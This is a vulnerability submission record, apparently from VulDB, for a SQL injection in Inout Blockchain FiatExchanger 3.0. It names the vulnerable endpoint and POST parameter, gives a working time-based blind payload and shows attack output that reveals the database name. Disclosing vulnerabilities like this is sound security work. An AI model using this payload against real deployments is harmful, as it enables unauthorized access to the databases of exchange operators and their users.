Submit #177560: Inout Blockchain FiatExchanger 3.0 - SQL Injection

Title: Inout Blockchain FiatExchanger 3.0 - SQL Injection

Description:

# Exploit Title: Inout Blockchain FiatExchanger 3.0 - SQL Injection
# Date: 04/07/2023
# Exploit Author: CraCkEr
# Vendor: Inout Scripts
# Vendor Homepage: https://www.inoutscripts.com/
# Software Link: https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/
# Version: 3.0
# Tested on: Windows 10 Pro
# Impact: Database Access

Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Path: /index.php/coins/update_marketboxslider

----------------------------------------------
POST /index.php/coins/update_marketboxslider HTTP/2

marketcurrency=[SQLI]&displaylimit=4
----------------------------------------------

POST parameter 'marketcurrency' is vulnerable to SQL Injection

---
Parameter: marketcurrency (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: marketcurrency=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&displaylimit=4
---

[+] Starting the Attack

fetching current database
current database: '*****_blockchain_fiatexchanger_**'

[-] Done

User: skalvin (UID 49463)
Submission: 04/07/2023 17:58 (3 years ago)
Moderation: 11/07/2023 17:26 (7 days later)
Status: Accepted
VulDB entry: 233577 [Nesote Inout Blockchain FiatExchanger 3.0 POST Parameter update_marketboxslider marketcurrency SQL injection]
Points: 17
